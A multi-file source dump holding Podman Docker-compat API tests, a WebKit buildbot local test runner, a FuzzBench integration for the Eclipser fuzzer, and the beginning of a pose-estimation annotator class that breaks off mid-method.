self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.content)
self.assertIn(type(obj), (list,))
def test_pull(self):
r = requests.post(_url("/images/pull?reference=alpine"), timeout=15)
self.assertEqual(r.status_code, 200, r.status_code)
text = r.text
keys = {
"error": False,
"id": False,
"images": False,
"stream": False,
}
# Read and record stanzas from pull
for line in str.splitlines(text):
obj = json.loads(line)
key_list = list(obj.keys())
for k in key_list:
keys[k] = True
self.assertFalse(keys["error"], "Expected no errors")
self.assertTrue(keys["id"], "Expected to find id stanza")
self.assertTrue(keys["images"], "Expected to find images stanza")
self.assertTrue(keys["stream"], "Expected to find stream progress stanza's")
def test_search_compat(self):
url = PODMAN_URL + "/v1.40/images/search"
# Had issues with this test hanging when repositories not happy
def do_search1():
payload = {"term": "alpine"}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
objs = json.loads(r.text)
self.assertIn(type(objs), (list,))
def do_search2():
payload = {"term": "alpine", "limit": 1}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
objs = json.loads(r.text)
self.assertIn(type(objs), (list,))
self.assertEqual(len(objs), 1)
def do_search3():
payload = {"term": "alpine", "filters": '{"is-official":["true"]}'}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
objs = json.loads(r.text)
self.assertIn(type(objs), (list,))
# There should be only one official image
self.assertEqual(len(objs), 1)
def do_search4():
headers = {"X-Registry-Auth": "null"}
payload = {"term": "alpine"}
r = requests.get(url, params=payload, headers=headers, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
def do_search5():
headers = {"X-Registry-Auth": "invalid value"}
payload = {"term": "alpine"}
r = requests.get(url, params=payload, headers=headers, timeout=5)
self.assertEqual(r.status_code, 400, r.text)
search_methods = [do_search1, do_search2, do_search3, do_search4, do_search5]
for search_method in search_methods:
search = Process(target=search_method)
search.start()
search.join(timeout=10)
self.assertFalse(search.is_alive(), "/images/search took too long")
def test_ping(self):
required_headers = (
"API-Version",
"Builder-Version",
"Docker-Experimental",
"Cache-Control",
"Pragma",
"Pragma",
)
def check_headers(req):
for k in required_headers:
self.assertIn(k, req.headers)
r = requests.get(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "OK")
check_headers(r)
r = requests.head(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "")
check_headers(r)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "OK")
check_headers(r)
r = requests.head(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "")
check_headers(r)
def test_history_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/images/alpine/history")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageHistory
required_keys = ("Id", "Created", "CreatedBy", "Tags", "Size", "Comment")
objs = json.loads(r.content)
self.assertIn(type(objs), (list,))
for o in objs:
self.assertIsInstance(o, dict)
for k in required_keys:
self.assertIn(k, o)
def test_network_compat(self):
name = "Network_" + "".join(random.choice(string.ascii_letters) for i in range(10))
# Cannot test for 0 existing networks because default "podman" network always exists
create = requests.post(PODMAN_URL + "/v1.40/networks/create", json={"Name": name})
self.assertEqual(create.status_code, 201, create.content)
obj = json.loads(create.content)
self.assertIn(type(obj), (dict,))
self.assertIn("Id", obj)
ident = obj["Id"]
self.assertNotEqual(name, ident)
ls = requests.get(PODMAN_URL + "/v1.40/networks")
self.assertEqual(ls.status_code, 200, ls.content)
objs = json.loads(ls.content)
self.assertIn(type(objs), (list,))
found = False
for network in objs:
if network["Name"] == name:
found = True
self.assertTrue(found, f"Network {name} not found")
inspect = requests.get(PODMAN_URL + f"/v1.40/networks/{ident}")
self.assertEqual(inspect.status_code, 200, inspect.content)
obj = json.loads(inspect.content)
self.assertIn(type(obj), (dict,))
inspect = requests.delete(PODMAN_URL + f"/v1.40/networks/{ident}")
self.assertEqual(inspect.status_code, 204, inspect.content)
inspect = requests.get(PODMAN_URL + f"/v1.40/networks/{ident}")
self.assertEqual(inspect.status_code, 404, inspect.content)
# network prune
prune_name = "Network_" + "".join(random.choice(string.ascii_letters) for i in range(10))
prune_create = requests.post(
PODMAN_URL + "/v1.40/networks/create", json={"Name": prune_name}
)
self.assertEqual(prune_create.status_code, 201, prune_create.content)
prune = requests.post(PODMAN_URL + "/v1.40/networks/prune")
self.assertEqual(prune.status_code, 200, prune.content)
obj = json.loads(prune.content)
self.assertTrue(prune_name in obj["NetworksDeleted"])
def test_volumes_compat(self):
name = "Volume_" + "".join(random.choice(string.ascii_letters) for i in range(10))
ls = requests.get(PODMAN_URL + "/v1.40/volumes")
self.assertEqual(ls.status_code, 200, ls.content)
# See https://docs.docker.com/engine/api/v1.40/#operation/VolumeList
required_keys = (
"Volumes",
"Warnings",
)
obj = json.loads(ls.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
create = requests.post(PODMAN_URL + "/v1.40/volumes/create", json={"Name": name})
self.assertEqual(create.status_code, 201, create.content)
# See https://docs.docker.com/engine/api/v1.40/#operation/VolumeCreate
# and https://docs.docker.com/engine/api/v1.40/#operation/VolumeInspect
required_keys = (
"Name",
"Driver",
"Mountpoint",
"Labels",
"Scope",
"Options",
)
obj = json.loads(create.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
self.assertEqual(obj["Name"], name)
inspect = requests.get(PODMAN_URL + f"/v1.40/volumes/{name}")
self.assertEqual(inspect.status_code, 200, inspect.content)
obj = json.loads(inspect.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
rm = requests.delete(PODMAN_URL + f"/v1.40/volumes/{name}")
self.assertEqual(rm.status_code, 204, rm.content)
# recreate volume with data and then prune it
r = requests.post(PODMAN_URL + "/v1.40/volumes/create", json={"Name": name})
self.assertEqual(r.status_code, 201, r.content)
create = json.loads(r.content)
with open(os.path.join(create["Mountpoint"], "test_prune"), "w") as file:
file.writelines(["This is a test\n", "This is a good test\n"])
prune = requests.post(PODMAN_URL + "/v1.40/volumes/prune")
self.assertEqual(prune.status_code, 200, prune.content)
payload = json.loads(prune.content)
self.assertIn(name, payload["VolumesDeleted"])
self.assertGreater(payload["SpaceReclaimed"], 0)
def test_version(self):
r = requests.get(PODMAN_URL + "/v1.40/version")
self.assertEqual(r.status_code, 200, r.content)
r = requests.get(_url("/version"))
self.assertEqual(r.status_code, 200, r.content)
def test_df_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/system/df")
self.assertEqual(r.status_code, 200, r.content)
obj = json.loads(r.content)
self.assertIn("Images", obj)
self.assertIn("Containers", obj)
self.assertIn("Volumes", obj)
self.assertIn("BuildCache", obj)
def test_prune_compat(self):
name = "Ctnr_" + "".join(random.choice(string.ascii_letters) for i in range(10))
r = requests.post(
PODMAN_URL + f"/v1.40/containers/create?name={name}",
json={
"Cmd": ["cp", "/etc/motd", "/motd.size_test"],
"Image": "alpine:latest",
"NetworkDisabled": True,
},
)
self.assertEqual(r.status_code, 201, r.text)
create = json.loads(r.text)
r = requests.post(PODMAN_URL + f"/v1.40/containers/{create['Id']}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(PODMAN_URL + f"/v1.40/containers/{create['Id']}/wait")
self.assertEqual(r.status_code, 200, r.text)
wait = json.loads(r.text)
self.assertEqual(wait["StatusCode"], 0, wait["Error"]["Message"])
prune = requests.post(PODMAN_URL + "/v1.40/containers/prune")
self.assertEqual(prune.status_code, 200, prune.text)
prune_payload = json.loads(prune.text)
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
self.assertIn(create["Id"], prune_payload["ContainersDeleted"])
# Delete any orphaned containers
r = requests.get(PODMAN_URL + "/v1.40/containers/json?all=true")
self.assertEqual(r.status_code, 200, r.text)
for ctnr in json.loads(r.text):
requests.delete(PODMAN_URL + f"/v1.40/containers/{ctnr['Id']}?force=true")
prune = requests.post(PODMAN_URL + "/v1.40/images/prune")
self.assertEqual(prune.status_code, 200, prune.text)
prune_payload = json.loads(prune.text)
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
# FIXME need method to determine which image is going to be "pruned" to fix test
# TODO should handler be recursive when deleting images?
# self.assertIn(img["Id"], prune_payload["ImagesDeleted"][1]["Deleted"])
self.assertIsNotNone(prune_payload["ImagesDeleted"][1]["Deleted"])
def test_status_compat(self):
r = requests.post(
PODMAN_URL + "/v1.40/containers/create?name=topcontainer",
json={"Cmd": ["top"], "Image": "alpine:latest"},
)
self.assertEqual(r.status_code, 201, r.text)
payload = json.loads(r.text)
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertEqual(payload[0]["Status"], "Created")
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/pause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
self.assertTrue(str(payload[0]["Status"]).endswith("(Paused)"))
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/unpause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/stop")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertTrue(str(payload[0]["Status"]).startswith("Exited"))
r = requests.delete(PODMAN_URL + f"/v1.40/containers/{container_id}")
self.assertEqual(r.status_code, 204, r.text)
def test_pod_start_conflict(self):
"""Verify issue #8865"""
pod_name = list()
pod_name.append("Pod_" + "".join(random.choice(string.ascii_letters) for i in range(10)))
pod_name.append("Pod_" + "".join(random.choice(string.ascii_letters) for i in range(10)))
r = requests.post(
_url("/pods/create"),
json={
"name": pod_name[0],
"no_infra": False,
"portmappings": [{"host_ip": "127.0.0.1", "host_port": 8889, "container_port": 89}],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(
_url("/containers/create"),
json={
"pod": pod_name[0],
"image": "docker.io/alpine:latest",
"command": ["top"],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(
_url("/pods/create"),
json={
"name": pod_name[1],
"no_infra": False,
"portmappings": [{"host_ip": "127.0.0.1", "host_port": 8889, "container_port": 89}],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(
_url("/containers/create"),
json={
"pod": pod_name[1],
"image": "docker.io/alpine:latest",
"command": ["top"],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(_url(f"/pods/{pod_name[0]}/start"))
self.assertEqual(r.status_code, 200, r.text)
r = requests.post(_url(f"/pods/{pod_name[1]}/start"))
self.assertEqual(r.status_code, 409, r.text)
start = json.loads(r.text)
self.assertGreater(len(start["Errs"]), 0, r.text)
if __name__ == "__main__":
unittest.main()
|
run-buildbot-test.py
|
#!/usr/bin/env python
#
# Copyright (C) 2017 Igalia S.L.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
import signal
import os
import argparse
import subprocess
import tempfile
import shutil
import socket
import json
import traceback
import multiprocessing
from time import sleep
test_buildbot_master_tac = """
import os
from twisted.application import service
try:
from buildbot.master.bot import BuildMaster
except:
from buildbot.master import BuildMaster
basedir = os.path.dirname(os.path.realpath(__file__))
configfile = r'master.cfg'
application = service.Application('buildmaster')
BuildMaster(basedir, configfile).setServiceParent(application)
"""
worker_buildbot_master_tac = """
import os
from twisted.application import service
from buildslave.bot import BuildSlave
basedir = os.path.dirname(os.path.realpath(__file__))
buildmaster_host = 'localhost'
port = 17000
slavename = '%(worker)s'
passwd = '1234'
keepalive = 600
usepty = 1
application = service.Application('buildslave')
BuildSlave(buildmaster_host, port, slavename, passwd, basedir, keepalive, usepty).setServiceParent(application)
"""
def check_tcp_port_open(address, port):
s = socket.socket()
try:
s.connect((address, port))
return True
except:
return False
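# Returns True when the twistd log reports that the buildbot database schema must be upgraded.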
def upgrade_db_needed(log):
try:
with open(log) as f:
for l in f:
if 'upgrade the database' in l:
return True
except:
return False
return False
def create_tempdir(tmpdir=None):
if tmpdir is not None:
if not os.path.isdir(tmpdir):
raise ValueError('%s is not a directory' % tmpdir)
return tempfile.mkdtemp(prefix=os.path.join(os.path.abspath(tmpdir), 'tmp'))
return tempfile.mkdtemp()
def print_if_error_stdout_stderr(cmd, retcode, stdout=None, stderr=None, extramsg=None):
if retcode != 0:
if isinstance(cmd, list):
cmd = ' '.join(cmd)
print('WARNING: "%s" returned %s status code' % (cmd, retcode))
if stdout is not None:
print(stdout)
if stderr is not None:
print(stderr)
if extramsg is not None:
print(extramsg)
def setup_master_workdir(configdir, base_workdir):
master_workdir = os.path.join(base_workdir, 'master')
print('Copying files from %s to %s ...' % (configdir, master_workdir))
shutil.copytree(configdir, master_workdir)
print('Generating buildbot files at %s ...' % master_workdir)
with open(os.path.join(master_workdir, 'buildbot.tac'), 'w') as f:
f.write(test_buildbot_master_tac)
mkpwd_cmd = ['./make_passwords_json.py']
mkpwd_process = subprocess.Popen(mkpwd_cmd, cwd=master_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = mkpwd_process.communicate()
print_if_error_stdout_stderr(mkpwd_cmd, mkpwd_process.returncode, stdout, stderr)
return master_workdir
def wait_for_master_ready(master_workdir):
master_ready_check_counter = 0
while True:
if os.path.isfile(os.path.join(master_workdir, '.master-is-ready')):
return
if master_ready_check_counter > 60:
raise RuntimeError('ERROR: Aborting after waiting 60 seconds for the master to start.')
sleep(1)
master_ready_check_counter += 1
def start_master(master_workdir):
# This is started via multiprocessing. We set a new process group here
# to be able to reliably kill this subprocess and all of its children during cleanup.
os.setsid()
buildmasterlog = os.path.join(master_workdir, 'buildmaster.log')
dbupgraded = False
retry = True
if check_tcp_port_open('localhost', 8710):
print('ERROR: There is some process already listening on port 8710')
return 1
while retry:
retry = False
print('Starting the twistd process ...')
twistd_cmd = ['twistd', '-l', buildmasterlog, '-noy', 'buildbot.tac']
twistd_process = subprocess.Popen(twistd_cmd, cwd=master_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while twistd_process.poll() is None:
if check_tcp_port_open('localhost', 8710):
print('Test buildmaster ready!\n\n'
+ ' - See buildmaster log:\n'
+ ' tail -f %s\n' % buildmasterlog
+ ' - Open a browser to:\n'
+ ' http://localhost:8710\n'
+ ' - Credentials for triggering manual builds:\n'
+ ' login: committer@webkit.org\n'
+ ' password: committerpassword\n')
with open(os.path.join(master_workdir, '.master-is-ready'), 'w') as f:
f.write('ready')
twistd_process.wait()
return 0
sleep(1)
stdout, stderr = twistd_process.communicate()
if twistd_process.returncode == 0 and upgrade_db_needed(buildmasterlog) and not dbupgraded:
retry = True
dbupgraded = True
print('Upgrading the database ...')
upgrade_cmd = ['buildbot', 'upgrade-master', master_workdir]
upgrade_process = subprocess.Popen(upgrade_cmd, cwd=master_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = upgrade_process.communicate()
print_if_error_stdout_stderr(upgrade_cmd, upgrade_process.returncode, stdout, stderr)
else:
print_if_error_stdout_stderr(twistd_cmd, twistd_process.returncode, stdout, stderr,
'Check the log at %s' % buildmasterlog)
return 0
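# Worker names are the keys of the passwords.json file generated by make_passwords_json.py.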
def get_list_workers(master_workdir):
password_list = os.path.join(master_workdir, 'passwords.json')
with open(password_list) as f:
passwords = json.load(f)
list_workers = []
for worker in passwords.keys():
list_workers.append(str(worker))
return list_workers
def start_worker(base_workdir, worker):
# This is started via multiprocessing. We set a new process group here
# to be able to reliably kill this subprocess and all of its children during cleanup.
os.setsid()
worker_workdir = os.path.join(base_workdir, worker)
os.mkdir(worker_workdir)
with open(os.path.join(worker_workdir, 'buildbot.tac'), 'w') as f:
f.write(worker_buildbot_master_tac % {'worker': worker})
twistd_cmd = ['twistd', '-l', 'worker.log', '-noy', 'buildbot.tac']
twistd_worker_process = subprocess.Popen(twistd_cmd, cwd=worker_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
try:
stdout, stderr = twistd_worker_process.communicate()
except:
twistd_worker_process.kill()
return
print_if_error_stdout_stderr(twistd_cmd, twistd_worker_process.returncode, stdout, stderr,
'Check the log at %s' % os.path.join(worker_workdir, 'worker.log'))
def clean(temp_dir):
if os.path.isdir(temp_dir):
print('\n\nCleaning %s ... \n' % (temp_dir))
# shutil.rmtree can fail if we hold an open file descriptor on temp_dir
# (which is very likely when cleaning) or if temp_dir is an NFS mount.
# Use rm instead that always works.
rm = subprocess.Popen(['rm', '-fr', temp_dir])
rm.wait()
def cmd_exists(cmd):
return any(os.access(os.path.join(path, cmd), os.X_OK)
for path in os.environ['PATH'].split(os.pathsep))
def check_buildbot_installed():
if cmd_exists('twistd') and cmd_exists('buildbot'):
return
raise RuntimeError('Buildbot is not installed.')
def setup_virtualenv(base_workdir_temp):
if cmd_exists('virtualenv'):
print('Setting up virtualenv at %s ... ' % base_workdir_temp)
virtualenv_cmd = ['virtualenv', '-p', 'python2', 'venv']
virtualenv_process = subprocess.Popen(virtualenv_cmd, cwd=base_workdir_temp,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = virtualenv_process.communicate()
print_if_error_stdout_stderr(virtualenv_cmd, virtualenv_process.returncode, stdout, stderr)
virtualenv_bindir = os.path.join(base_workdir_temp, 'venv', 'bin')
virtualenv_pip = os.path.join(virtualenv_bindir, 'pip')
if not os.access(virtualenv_pip, os.X_OK):
print('Something went wrong setting up virtualenv. '
'Trying to continue using the system version of buildbot')
return
print('Setting up buildbot dependencies on the virtualenv ... ')
# The idea is to install the very same version of buildbot and its
# dependencies than the ones used for running https://build.webkit.org/about
pip_cmd = [virtualenv_pip, 'install',
'buildbot==0.8.6p1',
'buildbot-slave==0.8.6p1',
'twisted==12.1.0',
'jinja2==2.6',
'sqlalchemy==0.7.8',
'sqlalchemy-migrate==0.12.0']
pip_process = subprocess.Popen(pip_cmd, cwd=base_workdir_temp,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = pip_process.communicate()
print_if_error_stdout_stderr(pip_cmd, pip_process.returncode, stdout, stderr)
os.environ['PATH'] = virtualenv_bindir + ':' + os.environ['PATH']
return
print('WARNING: virtualenv not installed. '
'Trying to continue using the system version of buildbot')
def configdir_is_valid(configdir):
return(os.path.isdir(configdir) and
os.path.isfile(os.path.join(configdir, 'config.json')) and
os.path.isfile(os.path.join(configdir, 'master.cfg')) and
os.access(os.path.join(configdir, 'make_passwords_json.py'), os.X_OK))
def main(configdir, basetempdir=None, no_clean=False, no_workers=False, use_system_version=False):
configdir = os.path.abspath(os.path.realpath(configdir))
if not configdir_is_valid(configdir):
raise ValueError('The configdir %s does not contain the buildmaster files expected by this script' % configdir)
base_workdir_temp = os.path.abspath(os.path.realpath(create_tempdir(basetempdir)))
if base_workdir_temp.startswith(configdir):
raise ValueError('The temporary working directory %s cannot be located inside configdir %s' % (base_workdir_temp, configdir))
try:
if not use_system_version:
setup_virtualenv(base_workdir_temp)
check_buildbot_installed()
master_workdir = setup_master_workdir(configdir, base_workdir_temp)
master_runner = multiprocessing.Process(target=start_master, args=(master_workdir,))
master_runner.start()
wait_for_master_ready(master_workdir)
if no_workers:
print(' - To manually attach a build worker use this info:\n'
+ ' TCP port for the worker-to-master connection: 17000\n'
+ ' worker-id: the one defined at %s\n' % os.path.join(master_workdir, 'passwords.json')
+ ' password: 1234\n')
else:
worker_runners = []
for worker in get_list_workers(master_workdir):
worker_runner = multiprocessing.Process(target=start_worker, args=(base_workdir_temp, worker,))
worker_runner.start()
worker_runners.append(worker_runner)
print(' - Workers started!\n'
+ ' Check the log for each one at %s/${worker-name-id}/worker.log\n' % base_workdir_temp
+ ' tail -f %s/*/worker.log\n' % base_workdir_temp)
for worker_runner in worker_runners:
worker_runner.join()
master_runner.join()
except:
traceback.print_exc()
finally:
try:
# The children may exit between the check and the kill call.
# Ignore any exception raised here.
for c in multiprocessing.active_children():
# Send the signal to the whole process group.
# Otherwise some twistd child processes can remain alive.
os.killpg(os.getpgid(c.pid), signal.SIGKILL)
except:
pass
if not no_clean:
clean(base_workdir_temp)
sys.exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--config-dir', help='Path to the directory of the build master config files. '
'Defaults to the directory where this script is located.',
dest='configdir', type=str,
default=os.path.dirname(__file__))
parser.add_argument('--base-temp-dir', help='Path where the temporary working directory will be created. '
'Note: To trigger test builds with the test workers you need enough free space on that path.',
dest='basetempdir', default=None, type=str)
parser.add_argument('--no-clean', help='Do not clean the temporary working dir on exit.',
dest='no_clean', action='store_true')
parser.add_argument('--no-workers', help='Do not start the test workers.',
dest='no_workers', action='store_true')
parser.add_argument('--use-system-version', help='Instead of setting up a virtualenv with the buildbot version '
'used by build.webkit.org, use the buildbot version installed on this system.',
dest='use_system_version', action='store_true')
args = parser.parse_args()
main(args.configdir, args.basetempdir, args.no_clean, args.no_workers, args.use_system_version)
|
fuzzer.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration code for Eclipser fuzzer. Note that starting from v2.0, Eclipser
relies on AFL to perform random-based fuzzing."""
import subprocess
import os
import threading
from fuzzers import utils
from fuzzers.afl import fuzzer as afl_fuzzer
from fuzzers.afl_qemu import fuzzer as afl_fuzzer_qemu
def get_eclipser_outdir(target_directory):
"""Return path to eclipser target directory."""
return os.path.join(target_directory, 'eclipser_benchmark')
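# The benchmark is built twice: once via AFL's QEMU build for the AFL worker, and once as a plain
# standalone binary for Eclipser, placed in a separate output directory.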
def build():
"""Build benchmark."""
# Backup the environment.
new_env = os.environ.copy()
# Build afl with qemu (shared build code afl/afl++)
afl_fuzzer_qemu.build()
# Next, build a binary for Eclipser.
src = os.getenv('SRC')
work = os.getenv('WORK')
eclipser_outdir = get_eclipser_outdir(os.environ['OUT'])
os.mkdir(eclipser_outdir)
new_env['CC'] = 'clang'
new_env['CXX'] = 'clang++'
new_env['CFLAGS'] = ' '.join(utils.NO_SANITIZER_COMPAT_CFLAGS)
cxxflags = [utils.LIBCPLUSPLUS_FLAG] + utils.NO_SANITIZER_COMPAT_CFLAGS
new_env['CXXFLAGS'] = ' '.join(cxxflags)
new_env['OUT'] = eclipser_outdir
new_env['FUZZER_LIB'] = '/libStandaloneFuzzTarget.a'
new_env['FUZZ_TARGET'] = os.path.join(
eclipser_outdir, os.path.basename(os.getenv('FUZZ_TARGET')))
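# This second copy is compiled with plain clang (so without AFL instrumentation),
# linked against the standalone driver stub, and written to its own output directory.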
print('[build] Re-building benchmark for eclipser fuzzing target.')
with utils.restore_directory(src), utils.restore_directory(work):
utils.build_benchmark(env=new_env)
def eclipser(input_corpus, output_corpus, target_binary):
"""Run Eclipser."""
# We will use output_corpus as a directory where AFL and Eclipser sync their
# test cases with each other. For Eclipser, we should explicitly specify an
# output directory under this sync directory.
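# Sketch of the resulting layout: <output_corpus>/eclipser_output/ for Eclipser (set just
# below) and <output_corpus>/afl-worker/ for the AFL secondary instance started in afl_worker().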
eclipser_out = os.path.join(output_corpus, "eclipser_output")
command = [
'dotnet',
'/Eclipser/build/Eclipser.dll',
'-p',
target_binary,
'-s',
output_corpus,
'-o',
eclipser_out,
'--arg', # Specifies the command-line of the program.
'foo',
'-f', # Specifies the path of file input to fuzz.
'foo',
'-v', # Controls the verbosity.
'2',
'--exectimeout',
'5000',
]
if os.listdir(input_corpus): # Specify inputs only if any seed exists.
command += ['-i', input_corpus]
print('[eclipser] Run Eclipser with command: ' + ' '.join(command))
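# Launch Eclipser in the background; Popen returns immediately, so this call does not
# block while Eclipser runs alongside the AFL worker started from fuzz().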
subprocess.Popen(command)
def afl_worker(input_corpus, output_corpus, target_binary):
"""Run AFL worker instance."""
print('[afl_worker] Run AFL worker')
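# '-Q' runs the target under AFL's QEMU mode (binary-only instrumentation) and
# '-S afl-worker' registers this as a secondary instance, so it syncs through output_corpus.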
afl_fuzzer.run_afl_fuzz(input_corpus, output_corpus, target_binary,
['-Q', '-S', 'afl-worker'], True)
def fuzz(input_corpus, output_corpus, target_binary):
"""Run fuzzer."""
# Calculate eclipser binary path from the afl target binary.
target_binary_directory = os.path.dirname(target_binary)
eclipser_target_binary_directory = (
get_eclipser_outdir(target_binary_directory))
target_binary_name = os.path.basename(target_binary)
eclipser_target_binary = os.path.join(eclipser_target_binary_directory,
target_binary_name)
afl_fuzzer.prepare_fuzz_environment(input_corpus)
afl_args = (input_corpus, output_corpus, target_binary)
eclipser_args = (input_corpus, output_corpus, eclipser_target_binary)
# Do not launch AFL master instance for now, to reduce memory usage and
# align with the vanilla AFL.
print('[fuzz] Running AFL worker')
afl_worker_thread = threading.Thread(target=afl_worker, args=afl_args)
afl_worker_thread.start()
print('[fuzz] Running Eclipser')
eclipser_thread = threading.Thread(target=eclipser, args=eclipser_args)
eclipser_thread.start()
print('[fuzz] Now waiting for threads to finish...')
afl_worker_thread.join()
eclipser_thread.join()
|
interface.py
|
import copy
import json
import threading
import time
import numpy as np
from src.system.identity_tracker import IdentityTracker
from src.system.model_factory import ModelFactory
from src.utils.pose import PoseConfig, Pose2D, Pose3D
class AnnotatorInterface:
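# Minimum delay, in seconds, between two runs of the object detector in the background routine.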
EXTRA_OBJECT_DETECTION_DELAY = 0.50
def __init__(self, bbox_model, pose_2d_model, pose_3d_model, max_persons):
self.bbox_model = bbox_model
self.pose_2d_model = pose_2d_model
self.pose_3d_model = pose_3d_model
self.persons = {}
self.last_image = None
self.persons_lock = threading.Lock()
self.available_person_id = set(range(max_persons))
self.last_object_detector_timestamp = 0
# kill threaded object detector routine
self.object_detector_kill_trigger = False
self.person_hash_provider = 0
threading.Thread(target=self.person_identification_routine).start()
"""
Build the annotator interface using the model defined in the model factory
"""
@staticmethod
def build(max_persons=1):
bbox_model = ModelFactory.build_object_detection_interface()
pose_2d_model = ModelFactory.build_pose_2d_interface()
pose_3d_model = ModelFactory.build_pose_3d_interface()
return AnnotatorInterface(bbox_model, pose_2d_model, pose_3d_model, max_persons)
"""
Create a new person annotation
"""
def _new_person(self, person_id):
self.person_hash_provider = (self.person_hash_provider + 1) % 1000000
return {
'id': person_id,
'bbox':None,
'pose_2d':None,
'pose_3d':None,
'confidence':np.array([0.25 for _ in range(PoseConfig.get_total_joints())]),
'hash':self.person_hash_provider
}
"""
Background routine, started in a thread by the init method,
used to manage incoming and outgoing people
"""
def person_identification_routine(self):
while not self.object_detector_kill_trigger:
time.sleep(0.10)
pid_to_remove, detected_boxes_to_add = set(), set()
with self.persons_lock:
curr_persons = [p for p in copy.deepcopy(self.persons).values() if p['pose_2d'] is not None]
# filter pose with a too low confidence [pid_to_remove]
for pid in range(len(curr_persons)):
# score person confidence using most easily recognizable joints
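# the head is weighted 5x; together with the 6 shoulder/hip/knee joints the total weight is 11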
person_confidence = 5*curr_persons[pid]['confidence'][PoseConfig.HEAD]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.R_SHOULDER]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.L_SHOULDER]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.R_HIP]
